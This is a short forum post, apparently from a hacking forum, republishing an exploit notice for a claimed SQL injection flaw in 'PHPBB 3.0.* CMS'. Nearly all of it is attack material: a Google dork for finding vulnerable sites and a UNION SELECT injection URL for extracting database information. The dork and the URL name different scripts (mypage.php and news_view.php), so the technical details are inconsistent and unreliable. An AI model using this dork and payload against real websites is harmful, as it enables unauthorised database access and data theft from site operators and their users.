Форум АНТИЧАТ - Показать сообщение отдельно

===========================================

PHPBB 3.0.* CMS SQL Injection Vulnerability

===========================================

# Exploit Title: PHPBB 3.0.* CMS SQLinjection

# Date: 2010-08-27

# Team: eX.ploit ( Abjects #ex.ploit )

# Software Link: http://www.phpbb.com/

# Version: PHPBB3.0.* CMS only (does not work on FORUM only)

# Tested on: Linux

# Usage: SQLinjection

# Gain detailed database information

Google dork:[inurl:mypage.php?id= & "Powered by phpBB"]

# Tested on:linux/php

Url| http://www.website.com/news_view.php?id=1

Vuln: http://www.website.com/news_view.php?id=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4

# Inj3ct0r.com [2010-08-27]